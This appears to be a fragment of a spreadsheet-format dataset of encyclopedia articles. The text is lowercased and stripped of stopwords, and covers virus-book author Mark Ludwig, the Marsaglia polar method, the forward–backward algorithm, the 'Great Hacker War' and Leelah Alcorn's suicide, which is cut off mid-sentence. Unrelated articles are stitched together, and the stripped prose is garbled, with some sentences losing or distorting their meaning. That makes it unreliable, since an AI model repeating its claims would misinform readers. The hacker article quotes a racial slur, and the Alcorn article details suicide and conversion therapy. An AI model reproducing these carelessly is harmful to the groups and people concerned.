    <t>mark allen ludwig (august 1958 2011) physicist author books computer viruses artificial life. ludwig spent less years undergraduate mit, reputedly still able physics doctorate program caltech basis recommendation letters past teachers classmate stephen wolfram richard feynman's course advanced mathematical methods physics. died cancer work ludwig virus-writing periodical, computer virus developments quarterly. also held first international virus writing competition, promised monetary reward $200 creator smallest dos-based, parasitic file infecter.his little black book computer viruses fully describes sophisticated ms-dos executable virus. second, giant black book computer viruses contains source code unix companion viruses written book computer viruses, artificial life evolution: little black book computer viruses argued intelligent design. book criticized biologist gert korthof making errors incorrect statements evolutionary biology. publications christian revolutionary (2009) true christian government: facts about what bible about government (2009) third paradigm: democracy headed monarch divine right. what will replace (2009) third paradigm: government 21st century (1997) little black book computer viruses (1996) giant black book computer viruses (1995) computer viruses, artificial life evolution (1993) little black book email viruses (2002) references</t>
  </si>
  <si>
    <t>Marsaglia polar method</t>
  </si>
  <si>
    <t>marsaglia polar method pseudo-random number sampling method generating pair independent standard normal random variables. while superior box–muller transform, ziggurat algorithm even efficient.standard normal random variables frequently used computer science, computational statistics, particular, applications monte carlo method. polar method works choosing random points square {\displaystyle 0&lt;s=x^{2}+y^{2}&lt;1,\,} returning required pair normal random variables {\displaystyle x{\sqrt {\frac {-2\ln(s)}{s}}}\,,\ y{\sqrt {\frac {-2\ln(s)}{s}}},} equivalently, {\displaystyle {\frac {x}{\sqrt {s}}}{\sqrt {-2\ln(s)}}\,,\ {\frac {y}{\sqrt {s}}}{\sqrt {-2\ln(s)}},} {\displaystyle x/{\sqrt {s}}} {\displaystyle y/{\sqrt {s}}} represent cosine sine angle vector makes axis. theoretical basis underlying theory summarized follows: uniformly distributed interval point (cos(2πu), sin(2πu)) uniformly distributed unit circumference multiplying point independent random variable whose distribution {\displaystyle \pr(\rho &lt;a)=\int _{0}^{a}re^{-r^{2}/2}\,dr} produce point {\displaystyle \left(\rho \cos(2\pi u),\rho \sin(2\pi u)\right)} whose coordinates jointly distributed independent standard normal random variables. history this idea dates back laplace, gauss credits finding {\displaystyle i=\int _{-\infty }^{\infty }e^{-x^{2}/2}\,dx} taking square root {\displaystyle i^{2}=\int _{-\infty }^{\infty }\int _{-\infty }^{\infty }e^{-(x^{2}+y^{2})/2}\,dx\,dy=\int _{0}^{2\pi }\int _{0}^{\infty }re^{-r^{2}/2}\,dr\,d\theta transformation polar coordinates makes evident uniformly distributed (constant density) radial distance density {\displaystyle re^{-r^{2}/2}.\,} appropriate square distribution.) this method producing pair independent standard normal variates radially projecting random point unit circumference distance given square root chi-square-2 variate called polar method generating pair normal random variables, practical considerations direct application idea, {\displaystyle x={\sqrt {-2\ln(u_{1})}}\cos(2\pi u_{2}),\quad y={\sqrt {-2\ln(u_{1})}}\sin(2\pi u_{2})} called box–muller transform, variate usually generated {\displaystyle {\sqrt {-2\ln(u_{1})}},} transform requires logarithm, square root, sine cosine functions. processors, cosine sine argument calculated parallel using single instruction. notably intel-based machines, fsincos assembler instruction expi instruction (available e.g. calculate complex expi {\displaystyle \operatorname {expi} (z)=e^{iz}=\cos(z)+i\sin(z),\,} separate real imaginary parts. note: explicitly calculate complex-polar form following substitutions general form, {\displaystyle r={\sqrt {-2\ln(u_{1})}}} {\displaystyle z=2\pi u_{2}.} then {\displaystyle re^{iz}={\sqrt {-2\ln(u_{1})}}e^{i2\pi u_{2}}={\sqrt {-2\ln(u_{1})}}\left[\cos(2\pi u_{2})+i\sin(2\pi u_{2})\right].} contrast, polar method removes need calculate cosine sine. instead, solving point unit circle, functions replaced coordinates normalized {\displaystyle {\sqrt {x^{2}+y^{2}}}} radius. particular, random point inside unit circle projected onto unit circumference setting {\displaystyle s=x^{2}+y^{2}} forming point {\displaystyle \left({\frac {x}{\sqrt {s}}},{\frac {y}{\sqrt {s}}}\right),\,} faster procedure calculating cosine sine. some researchers argue conditional instruction (for rejecting point outside unit circle), make programs slower modern processors equipped pipelining branch prediction. also procedure requires evaluations underlying random number generator (only {\displaystyle /4\approx 79\%} generated points inside unit circle). that random point circumference radially projected required random distance means {\displaystyle {\sqrt {-2\ln(s)}},\,} using independent random point circumference uniformly distributed implementation simple implementation java using mean standard deviation: non-thread safe implementation using mean standard deviation: c++11 libstdc++'s implementation std::normal_distribution uses marsaglia polar method, quoted herein. references</t>
  </si>
  <si>
    <t>Forward–backward algorithm</t>
  </si>
  <si>
    <t>forward–backward algorithm inference algorithm hidden markov models computes posterior marginals hidden state variables given sequence observations/emissions {\displaystyle o_{1:t}:=o_{1},\dots ,o_{t}} i.e. computes, hidden state variables {\displaystyle x_{t}\in \{x_{1},\dots ,x_{t}\}} distribution {\displaystyle p(x_{t}\ o_{1:t})} this inference task usually called smoothing. algorithm makes principle dynamic programming efficiently compute values required obtain posterior marginal distributions passes. first pass goes forward time second goes backward time; hence name forward–backward algorithm. term forward–backward algorithm also used refer algorithm belonging general class algorithms operate sequence models forward–backward manner. sense, descriptions remainder article refer specific instance class. overview first pass, forward–backward algorithm computes forward probabilities provide, {\displaystyle t\in \{1,\dots ,t\}} probability ending particular state given first {\displaystyle observations sequence, i.e. {\displaystyle p(x_{t}\ o_{1:t})} second pass, algorithm computes backward probabilities provide probability observing remaining observations given starting point {\displaystyle i.e. {\displaystyle p(o_{t+1:t}\ x_{t})} these sets probability distributions combined obtain distribution states specific point time given entire observation sequence: {\displaystyle p(x_{t}\ o_{1:t})=p(x_{t}\ o_{1:t},o_{t+1:t})\propto p(o_{t+1:t}\ x_{t})p(x_{t}|o_{1:t})} last step follows application bayes' rule conditional independence {\displaystyle o_{t+1:t}} {\displaystyle o_{1:t}} given {\displaystyle x_{t}} outlined above, algorithm involves three steps: computing forward probabilities computing backward probabilities computing smoothed values.the forward backward steps also called "forward message pass" "backward message pass" terms message-passing used general belief propagation approaches. single observation sequence, probabilities used calculations next observation computed. smoothing step calculated simultaneously backward pass. this step allows algorithm take account past observations output computing accurate results. forward–backward algorithm used find likely state point time. cannot, however, used find likely sequence states (see viterbi algorithm). forward probabilities following description matrices probability values rather probability distributions, although general forward-backward algorithm applied continuous well discrete probability models. transform probability distributions related given hidden markov model matrix notation follows. transition probabilities {\displaystyle \mathbf (x_{t}\mid x_{t-1})} given random variable {\displaystyle x_{t}} representing possible states hidden markov model represented matrix {\displaystyle \mathbf column index {\displaystyle represent target state index {\displaystyle represents start state. transition row-vector state {\displaystyle \mathbf {\pi _{t}} incremental row-vector state {\displaystyle \mathbf {\pi _{t+1}} written {\displaystyle \mathbf {\pi _{t+1}} =\mathbf {\pi _{t}} \mathbf example represents system probability staying state step probability transitioning state 30%. transition matrix then: {\displaystyle \mathbf ={\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}} typical markov model would multiply state vector matrix obtain probabilities subsequent state. hidden markov model state unknown, instead observe events associated possible states. event matrix form: {\displaystyle \mathbf ={\begin{pmatrix}0.9&amp;0.1\\0.2&amp;0.8\end{pmatrix}}} provides probabilities observing events given particular state. example, event observed time state event probability occurring state. contrast, event observed time state event chance occurring. given arbitrary row-vector describing state system {\displaystyle \mathbf {\pi probability observing event then: {\displaystyle \mathbf (o=j)=\sum _{i}\pi _{i}b_{i,j}} probability given state leading observed event represented matrix form multiplying state row-vector {\displaystyle \mathbf {\pi observation matrix {\displaystyle \mathbf {o_{j}} =\mathrm {diag} (b_{*,o_{j}})} containing diagonal entries. continuing example, observation matrix event would {\displaystyle \mathbf {o_{1}} ={\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}} this allows calculate unnormalized probabilities state vector {\displaystyle \mathbf {\pi bayes rule, weighting likelihood element {\displaystyle \mathbf {\pi generated event {\displaystyle \mathbf {\pi =\mathbf {\pi \mathbf {o_{1}} make general procedure specific series observations. assuming initial state vector {\displaystyle \mathbf {\pi _{0}} (which optimized parameter repetitions forward-back procedure), begin {\displaystyle \mathbf {f_{0:0}} =\mathbf {\pi _{0}} updating state distribution weighting likelihood first observation: {\displaystyle \mathbf {f_{0:1}} =\mathbf {\pi _{0}\mathbf \mathbf {o_{o(1)}} this process carried forward additional observations using: {\displaystyle \mathbf {f_{0:t}} =\mathbf {f_{0:t-1}} \mathbf \mathbf {o_{o(t)}} this value forward unnormalized probability vector. i'th entry vector provides: {\displaystyle \mathbf {f_{0:t}} (i)=\mathbf (o_{1},o_{2},\dots ,o_{t},x_{t}=x_{i}|\mathbf {\pi _{0})} typically, normalize probability vector step entries scaling factor thus introduced step that: {\displaystyle \mathbf {{\hat {f}}_{0:t}} =c_{t}^{-1}\ \mathbf {{\hat {f}}_{0:t-1}} \mathbf \mathbf {o_{o(t)}} {\displaystyle \mathbf {{\hat {f}}_{0:t-1}} represents scaled vector previous step {\displaystyle c_{t}} represents scaling factor causes resulting vector's entries product scaling factors total probability observing given events irrespective final states: {\displaystyle \mathbf (o_{1},o_{2},\dots ,o_{t}|\mathbf {\pi _{0})=\prod _{s=1}^{t}c_{s}} this allows interpret scaled probability vector {\displaystyle \mathbf {{\hat {f}}_{0:t}} (i)={\frac {\mathbf {f_{0:t}} (i)}{\prod _{s=1}^{t}c_{s}}}={\frac {\mathbf (o_{1},o_{2},\dots ,o_{t},x_{t}=x_{i}|\mathbf {\pi _{0})}{\mathbf (o_{1},o_{2},\dots ,o_{t}|\mathbf {\pi _{0})}}=\mathbf (x_{t}=x_{i}|o_{1},o_{2},\dots ,o_{t},\mathbf {\pi _{0})} thus find product scaling factors provides total probability observing given sequence time scaled probability vector provides probability state time. backward probabilities similar procedure constructed find backward probabilities. these intend provide probabilities: {\displaystyle \mathbf {b_{t:t}} (i)=\mathbf (o_{t+1},o_{t+2},\dots ,o_{t}|x_{t}=x_{i})} that want assume start particular state {\displaystyle x_{t}=x_{i}} interested probability observing future events state. since initial state assumed given (i.e. prior probability state 100%), begin with: {\displaystyle \mathbf {b_{t:t}} =[1\ \dots ]^{t}} notice using column vector forward probabilities used vectors. work backwards using: {\displaystyle \mathbf {b_{t-1:t}} =\mathbf \mathbf {o_{t}} \mathbf {b_{t:t}} while could normalize vector well entries one, usually done. noting entry contains probability future event sequence given particular initial state, normalizing vector would equivalent applying bayes' theorem find likelihood initial state given future events (assuming uniform priors final state vector). however, common scale vector using {\displaystyle c_{t}} constants used forward probability calculations. {\displaystyle \mathbf {b_{t:t}} scaled, subsequent operations use: {\displaystyle \mathbf {{\hat {b}}_{t-1:t}} =c_{t}^{-1}\mathbf \mathbf {o_{t}} \mathbf {{\hat {b}}_{t:t}} {\displaystyle \mathbf {{\hat {b}}_{t:t}} represents previous, scaled vector. this result scaled probability vector related backward probabilities {\displaystyle \mathbf {{\hat {b}}_{t:t}} (i)={\frac {\mathbf {b_{t:t}} (i)}{\prod _{s=t+1}^{t}c_{s}}}} this useful allows find total probability state given time, multiplying values: {\displaystyle \mathbf {\gamma _{t}} (i)=\mathbf (x_{t}=x_{i}|o_{1},o_{2},\dots ,o_{t},\mathbf {\pi _{0})={\frac {\mathbf (o_{1},o_{2},\dots ,o_{t},x_{t}=x_{i}|\mathbf {\pi _{0})}{\mathbf (o_{1},o_{2},\dots ,o_{t}|\mathbf {\pi _{0})}}={\frac {\mathbf {f_{0:t}} (i)\cdot \mathbf {b_{t:t}} (i)}{\prod _{s=1}^{t}c_{s}}}=\mathbf {{\hat {f}}_{0:t}} (i)\cdot \mathbf {{\hat {b}}_{t:t}} (i)} understand this, note {\displaystyle \mathbf {f_{0:t}} (i)\cdot \mathbf {b_{t:t}} (i)} provides probability observing given events passes state {\displaystyle x_{i}} time this probability includes forward probabilities covering events time well backward probabilities include future events. this numerator looking equation, divide total probability observation sequence normalize value extract probability {\displaystyle x_{t}=x_{i}} these values sometimes called "smoothed values" combine forward backward probabilities compute final probability. values {\displaystyle \mathbf {\gamma _{t}} (i)} thus provide probability state time such, useful determining probable state time. term "most probable state" somewhat ambiguous. while probable state likely correct given point, sequence individually probable states likely probable sequence. this probabilities point calculated independently other. they take account transition probabilities states, thus possible states moments t+1) probable time points little probability occurring together, i.e. {\displaystyle \mathbf (x_{t}=x_{i},x_{t+1}=x_{j})\neq \mathbf (x_{t}=x_{i})\mathbf (x_{t+1}=x_{j})} probable sequence states produced observation sequence found using viterbi algorithm. example this example takes basis umbrella world russell norvig 2010 chapter would like infer weather given observation another person either carrying carrying umbrella. assume possible states weather: state rain, state rain. assume weather chance staying chance changing. transition probabilities then: {\displaystyle \mathbf ={\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}} also assume state generates possible events: event umbrella, event umbrella. conditional probabilities occurring state given probability matrix: {\displaystyle \mathbf ={\begin{pmatrix}0.9&amp;0.1\\0.2&amp;0.8\end{pmatrix}}} observe following sequence events: {umbrella, umbrella, umbrella, umbrella, umbrella} represent calculations {\displaystyle \mathbf {o_{1}} ={\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}~~\mathbf {o_{2}} ={\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}~~\mathbf {o_{3}} ={\begin{pmatrix}0.1&amp;0.0\\0.0&amp;0.8\end{pmatrix}}~~\mathbf {o_{4}} ={\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}~~\mathbf {o_{5}} ={\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}} note {\displaystyle \mathbf {o_{3}} differs others umbrella" observation. computing forward probabilities begin with: {\displaystyle \mathbf {f_{0:0}} ={\begin{pmatrix}0.5&amp;0.5\end{pmatrix}}} prior state vector indicating know state weather observations. while state vector given vector, transpose matrix calculations easier read. calculations written form: {\displaystyle (\mathbf {{\hat {f}}_{0:t}} )^{t}=c_{t}^{-1}\mathbf {o_{t}} (\mathbf )^{t}(\mathbf {{\hat {f}}_{0:t-1}} )^{t}} instead {\displaystyle \mathbf {{\hat {f}}_{0:t}} =c_{t}^{-1}\mathbf {{\hat {f}}_{0:t-1}} \mathbf \mathbf {o_{t}} notice transformation matrix also transposed, example transpose equal original matrix. performing calculations normalizing results provides: 0.5000 0.5000 0.4500 0.1000 0.8182 0.1818 {\displaystyle (\mathbf {{\hat {f}}_{0:1}} )^{t}=c_{1}^{-1}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.5000\\0.5000\end{pmatrix}}=c_{1}^{-1}{\begin{pmatrix}0.4500\\0.1000\end{pmatrix}}={\begin{pmatrix}0.8182\\0.1818\end{pmatrix}}} 0.8182 0.1818 0.5645 0.0745 0.8834 0.1166 {\displaystyle (\mathbf {{\hat {f}}_{0:2}} )^{t}=c_{2}^{-1}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.8182\\0.1818\end{pmatrix}}=c_{2}^{-1}{\begin{pmatrix}0.5645\\0.0745\end{pmatrix}}={\begin{pmatrix}0.8834\\0.1166\end{pmatrix}}} 0.8834 0.1166 0.0653 0.2772 0.1907 0.8093 {\displaystyle (\mathbf {{\hat {f}}_{0:3}} )^{t}=c_{3}^{-1}{\begin{pmatrix}0.1&amp;0.0\\0.0&amp;0.8\end{pmatrix}}{\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.8834\\0.1166\end{pmatrix}}=c_{3}^{-1}{\begin{pmatrix}0.0653\\0.2772\end{pmatrix}}={\begin{pmatrix}0.1907\\0.8093\end{pmatrix}}} 0.1907 0.8093 0.3386 0.1247 0.7308 0.2692 {\displaystyle (\mathbf {{\hat {f}}_{0:4}} )^{t}=c_{4}^{-1}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.1907\\0.8093\end{pmatrix}}=c_{4}^{-1}{\begin{pmatrix}0.3386\\0.1247\end{pmatrix}}={\begin{pmatrix}0.7308\\0.2692\end{pmatrix}}} 0.7308 0.2692 0.5331 0.0815 0.8673 0.1327 {\displaystyle (\mathbf {{\hat {f}}_{0:5}} )^{t}=c_{5}^{-1}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.7308\\0.2692\end{pmatrix}}=c_{5}^{-1}{\begin{pmatrix}0.5331\\0.0815\end{pmatrix}}={\begin{pmatrix}0.8673\\0.1327\end{pmatrix}}} backward probabilities start with: {\displaystyle \mathbf {b_{5:5}} ={\begin{pmatrix}1.0\\1.0\end{pmatrix}}} able compute (using observations reverse order normalizing different constants): 1.0000 1.0000 0.6900 0.4100 0.6273 0.3727 {\displaystyle \mathbf {{\hat {b}}_{4:5}} =\alpha {\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}1.0000\\1.0000\end{pmatrix}}=\alpha {\begin{pmatrix}0.6900\\0.4100\end{pmatrix}}={\begin{pmatrix}0.6273\\0.3727\end{pmatrix}}} 0.6273 0.3727 0.4175 0.2215 0.6533 0.3467 {\displaystyle \mathbf {{\hat {b}}_{3:5}} =\alpha {\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.6273\\0.3727\end{pmatrix}}=\alpha {\begin{pmatrix}0.4175\\0.2215\end{pmatrix}}={\begin{pmatrix}0.6533\\0.3467\end{pmatrix}}} 0.6533 0.3467 0.1289 0.2138 0.3763 0.6237 {\displaystyle \mathbf {{\hat {b}}_{2:5}} =\alpha {\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.1&amp;0.0\\0.0&amp;0.8\end{pmatrix}}{\begin{pmatrix}0.6533\\0.3467\end{pmatrix}}=\alpha {\begin{pmatrix}0.1289\\0.2138\end{pmatrix}}={\begin{pmatrix}0.3763\\0.6237\end{pmatrix}}} 0.3763 0.6237 0.2745 0.1889 0.5923 0.4077 {\displaystyle \mathbf {{\hat {b}}_{1:5}} =\alpha {\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.3763\\0.6237\end{pmatrix}}=\alpha {\begin{pmatrix}0.2745\\0.1889\end{pmatrix}}={\begin{pmatrix}0.5923\\0.4077\end{pmatrix}}} 0.5923 0.4077 0.3976 0.2170 0.6469 0.3531 {\displaystyle \mathbf {{\hat {b}}_{0:5}} =\alpha {\begin{pmatrix}0.7&amp;0.3\\0.3&amp;0.7\end{pmatrix}}{\begin{pmatrix}0.9&amp;0.0\\0.0&amp;0.2\end{pmatrix}}{\begin{pmatrix}0.5923\\0.4077\end{pmatrix}}=\alpha {\begin{pmatrix}0.3976\\0.2170\end{pmatrix}}={\begin{pmatrix}0.6469\\0.3531\end{pmatrix}}} finally, compute smoothed probability values. these results must also scaled entries scale backward probabilities {\displaystyle c_{t}} found earlier. backward probability vectors thus actually represent likelihood state time given future observations. because vectors proportional actual backward probabilities, result scaled additional time. 0.5000 0.5000 0.6469 0.3531 0.3235 0.1765 0.6469 0.3531 {\displaystyle (\mathbf {\gamma _{0}} )^{t}=\alpha {\begin{pmatrix}0.5000\\0.5000\end{pmatrix}}\circ {\begin{pmatrix}0.6469\\0.3531\end{pmatrix}}=\alpha {\begin{pmatrix}0.3235\\0.1765\end{pmatrix}}={\begin{pmatrix}0.6469\\0.3531\end{pmatrix}}} 0.8182 0.1818 0.5923 0.4077 0.4846 0.0741 0.8673 0.1327 {\displaystyle (\mathbf {\gamma _{1}} )^{t}=\alpha {\begin{pmatrix}0.8182\\0.1818\end{pmatrix}}\circ {\begin{pmatrix}0.5923\\0.4077\end{pmatrix}}=\alpha {\begin{pmatrix}0.4846\\0.0741\end{pmatrix}}={\begin{pmatrix}0.8673\\0.1327\end{pmatrix}}} 0.8834 0.1166 0.3763 0.6237 0.3324 0.0728 0.8204 0.1796 {\displaystyle (\mathbf {\gamma _{2}} )^{t}=\alpha {\begin{pmatrix}0.8834\\0.1166\end{pmatrix}}\circ {\begin{pmatrix}0.3763\\0.6237\end{pmatrix}}=\alpha {\begin{pmatrix}0.3324\\0.0728\end{pmatrix}}={\begin{pmatrix}0.8204\\0.1796\end{pmatrix}}} 0.1907 0.8093 0.6533 0.3467 0.1246 0.2806 0.3075 0.6925 {\displaystyle (\mathbf {\gamma _{3}} )^{t}=\alpha {\begin{pmatrix}0.1907\\0.8093\end{pmatrix}}\circ {\begin{pmatrix}0.6533\\0.3467\end{pmatrix}}=\alpha {\begin{pmatrix}0.1246\\0.2806\end{pmatrix}}={\begin{pmatrix}0.3075\\0.6925\end{pmatrix}}} 0.7308 0.2692 0.6273 0.3727 0.4584 0.1003 0.8204 0.1796 {\displaystyle (\mathbf {\gamma _{4}} )^{t}=\alpha {\begin{pmatrix}0.7308\\0.2692\end{pmatrix}}\circ {\begin{pmatrix}0.6273\\0.3727\end{pmatrix}}=\alpha {\begin{pmatrix}0.4584\\0.1003\end{pmatrix}}={\begin{pmatrix}0.8204\\0.1796\end{pmatrix}}} 0.8673 0.1327 1.0000 1.0000 0.8673 0.1327 0.8673 0.1327 {\displaystyle (\mathbf {\gamma _{5}} )^{t}=\alpha {\begin{pmatrix}0.8673\\0.1327\end{pmatrix}}\circ {\begin{pmatrix}1.0000\\1.0000\end{pmatrix}}=\alpha {\begin{pmatrix}0.8673\\0.1327\end{pmatrix}}={\begin{pmatrix}0.8673\\0.1327\end{pmatrix}}} notice value {\displaystyle \mathbf {\gamma _{0}} equal {\displaystyle \mathbf {{\hat {b}}_{0:5}} {\displaystyle \mathbf {\gamma _{5}} equal {\displaystyle \mathbf {{\hat {f}}_{0:5}} this follows naturally {\displaystyle \mathbf {{\hat {f}}_{0:5}} {\displaystyle \mathbf {{\hat {b}}_{0:5}} begin uniform priors initial final state vectors (respectively) take account observations. however, {\displaystyle \mathbf {\gamma _{0}} equal {\displaystyle \mathbf {{\hat {b}}_{0:5}} initial state vector represents uniform prior (i.e. entries equal). when case {\displaystyle \mathbf {{\hat {b}}_{0:5}} needs combined initial state vector find likely initial state. thus find forward probabilities sufficient calculate likely final state. similarly, backward probabilities combined initial state vector provide probable initial state given observations. forward backward probabilities need combined infer probable states initial final points. calculations reveal probable weather state every except third "rain". they tell this, however, provide quantify probabilities state different times. perhaps importantly, value {\displaystyle \mathbf {\gamma _{5}} quantifies knowledge state vector observation sequence. predict probability various weather states tomorrow well probability observing umbrella. performance forward–backward algorithm runs time complexity {\displaystyle o(s^{2}t)} space {\displaystyle o(st)} {\displaystyle length time sequence {\displaystyle number symbols state alphabet. algorithm also constant space time complexity {\displaystyle o(s^{2}t^{2})} recomputing values step. comparison, brute-force procedure would generate possible {\displaystyle s^{t}} state sequences calculate joint probability state sequence observed series events, would time complexity {\displaystyle o(t\cdot s^{t})} brute force intractable realistic problems, number possible hidden node sequences typically extremely high. enhancement general forward-backward algorithm, called island algorithm, trades smaller memory usage longer running time, taking {\displaystyle o(s^{2}t\log time {\displaystyle o(s^{2}\log memory. furthermore, possible invert process model obtain {\displaystyle o(s)} space, {\displaystyle o(s^{2}t)} time algorithm, although inverted process exist ill-conditioned.in addition, algorithms developed compute {\displaystyle \mathbf {f_{0:t+1}} efficiently online smoothing fixed-lag smoothing (fls) algorithm. pseudocode algorithm forward_backward input: guessstate sequenceindex output: result sequenceindex past sequence return (guessstate, sequenceindex) seen return saved result result neighboring state result result (transition probability guessstate given observation element sequenceindex) backward(n, sequenceindex save result (guessstate, sequenceindex) return result python example given (just like viterbi algorithm) represented python programming language: write implementation forward-backward algorithm like this: function fwd_bkw takes following arguments: sequence observations, e.g. ['normal', 'cold', 'dizzy']; states hidden states; start probability; transition probabilities; emission probabilities. simplicity code, assume observation sequence non-empty a[i][j] e[i][j] defined states i,j. running example, forward-backward algorithm used follows: also baum–welch algorithm viterbi algorithm bcjr algorithm references lawrence rabiner, tutorial hidden markov models selected applications speech recognition. proceedings ieee, (2), 257–286, february 1989. 10.1109/5.18626 lawrence rabiner, juang (january 1986). introduction hidden markov models". ieee assp magazine: 4–15. eugene charniak (1993). statistical language learning. cambridge, massachusetts: press. isbn 978-0-262-53141-2. stuart russell peter norvig (2010). artificial intelligence modern approach edition. upper saddle river, jersey: pearson education/prentice-hall. isbn 978-0-13-604259-4. external links interactive spreadsheet teaching forward–backward algorithm (spreadsheet article step-by-step walk-through) tutorial hidden markov models including forward–backward algorithm collection algorithms implemented java (including forward–backward algorithm)</t>
  </si>
  <si>
    <t>Great Hacker War</t>
  </si>
  <si>
    <t>great hacker purported conflict masters deception (mod), unsanctioned splinter faction older hacker group legion doom (lod), several smaller associated groups. both primary groups involved made attempts hack opposing group's networks, across internet, x.25, telephone networks. panel debate next hope conference, phiber optik re-iterated rumored "gang cyberspace" legion doom masters deception never happened, complete fabrication" attorney's office sensationalist media. furthermore, high-ranking members confirmed "great hacker war" never occurred, reinforcing idea competition one-upmanship war. timeline great hacker escalated space days four events. event great hacker began closing invite-only bulletin board called "fifth amendment," whose participants world's successful hackers. members newly reformed leadership chris goggans ("erik bloodaxe") loyd blankenship ("the mentor"). board's closing blamed john ("corrupt") cryptic message left users. chris goggans (lod) claimed distributing information discussed board. discovered chris goggans friends decided information posted board start security company contact companies discussed security flaws posted fifth amendment. event prank phone calls home number upset goggans prompted call find personal information members mod. peacemakers intervened, conference call arranged unnamed rboc telephone bridge midwest. members silently joined conference call, overheard members using racial slurs describe ethnicity members mod. peace conference quickly degenerated threats prank calls members lod, whose personal information already uncovered mod. event three last-minute, late-night peace talk held chris goggans (lod) mark abene ("phiber optik") mod. unknown goggans, john ("corrupt") listening three-way. goggans became angry abene would fulfill numerous demands personal information members, mod's hacking information considered property lod. abene refused meet goggans's demands, goggans uttered infamous phrase began earnest "mod nothing niggers, spics, white trash." that night, prank phone calls began flood abene's house. event four members decided eavesdrop chris goggans's phone calls determine motives. using undocumented remote headset feature dms-100 phone switch local goggans, overheard suspected earlier. goggans, scott chasin ("doc holiday"), jake kenyon shulman ("malefactor") decided form security company called comsec. epilogue 1991, phiber optik, attending first conference francisco craig neidorf, invited join telephone conference bridge fellow hackers apologetic shulman expressed remorse situation blown proportion view goggans crossed line informing hackers enforcement effort increase prestige comsec. further, suspected members goggans baited phoenix australian hacker group realm, instrumental providing evidence australian federal authorities. result, phiber, friend phoenix's, received conference call several original members suspicious goggans, wondering implicated goggans informants abene's pending legal case, addition expressing general distaste distrust goggans. 1993 third conference, also francisco, phiber/abene small handful friends (minus goggans) first time person despite friends nearly years point, briefly reminisced times. some years later public statement goggans would show regret involved abene testimonials enforcement. perhaps thing phiber luthor agree reality, simply "great hacker war", notion "warring hacker gangs" invention overzealous enforcement latched onto irresponsible mass media imagery made good copy. also hacker crackdown masters deception side great hacker legion doom chris goggans ("erik bloodaxe") side great hacker mark abene ("phiber optik") nahshon even-chaim ("phoenix") external links modbook4.txt book mod: part four: '90-'1991 modbook3.txt book mod: part three references masters deception: gang ruled cyberspace (isbn 0-06-092694-5) "gang cyberspace." wired 2.12 "notorious m.o.d." wired 9.06</t>
  </si>
  <si>
    <t>Leelah Alcorn</t>
  </si>
  <si>
    <t>leelah alcorn (november 1997 december 2014) american transgender girl whose suicide attracted international attention; posted suicide note tumblr blog societal standards affecting transgender people expressing hope death would create dialogue discrimination, abuse, lack support transgender people. born raised kings mills, ohio, alcorn assigned male birth grew family affiliated churches christ movement. came transgender parents, carla doug alcorn, refused accept female gender identity. when denied request undergo transition treatment, instead sending christian-based conversion therapy intention convincing reject gender identity accept gender assigned birth. after revealed attraction toward males classmates, parents removed school revoked access social media. suicide note, alcorn cited loneliness alienation reasons decision life blamed parents causing feelings. alcorn used tumblr's timer feature publish suicide note online several hours death, soon attracted international attention across mainstream social media. lgbt rights activists called attention incident evidence problems faced transgender youth, vigils held memory united states united kingdom. petitions formed calling establishment "leelah's law", conversion therapy united states, received supportive response then-president barack obama. within year, city cincinnati criminalized conversion therapy. alcorn's parents severely criticized misgendering deadnaming comments media, lgbt rights activist savage held responsible child's death, social media users harassed online. they defended refusal accept alcorn's identity conversion therapy reference christian beliefs. life leelah alcorn born kings mills, ohio, november 1997. described several children raised conservative christian environment; family attended northeast church christ cincinnati, featured profile church published 2011 article christian chronicle. 2014, family lived kings mills. according suicide note, alcorn felt "like girl trapped boy's body" since four, came identify transgender girl became aware term. rejected name given parents, signed suicide note "(leelah) josh alcorn". according note, immediately informed mother, reacted "extremely negatively" claiming phase made male, could never woman. stated made hate herself, developed form depression.alcorn's mother sent christian conversion therapists, alcorn later related encountered "more christians" telling "selfish wrong" "should look help". aged requested allowed undergo transition treatment, denied permission: words, felt hopeless, going look like drag rest life. 16th birthday, receive consent parents start transitioning, cried sleep." alcorn publicly revealed attraction males believed identifying point would stepping stone coming transgender later date. according childhood friend, alcorn received positive reception many kings high school, although parents appalled. alcorn's words, "they felt like attacking image, embarrassment them. they wanted perfect little straight christian boy, that's obviously wanted." they removed school enrolled eleventh grader ohio virtual academy online school.according alcorn, parents outside world five months denied access social media many forms communication. described significant contributing factor towards suicide. school year, returned mobile phone allowed regain contact friends, although time, according alcorn, relationship many become strained, continued feel isolated. months death, alcorn sought help reddit, asking users whether treatment perpetrated parents constituted child abuse. there, revealed parents never physically assaulted her, "they always talked derogatory 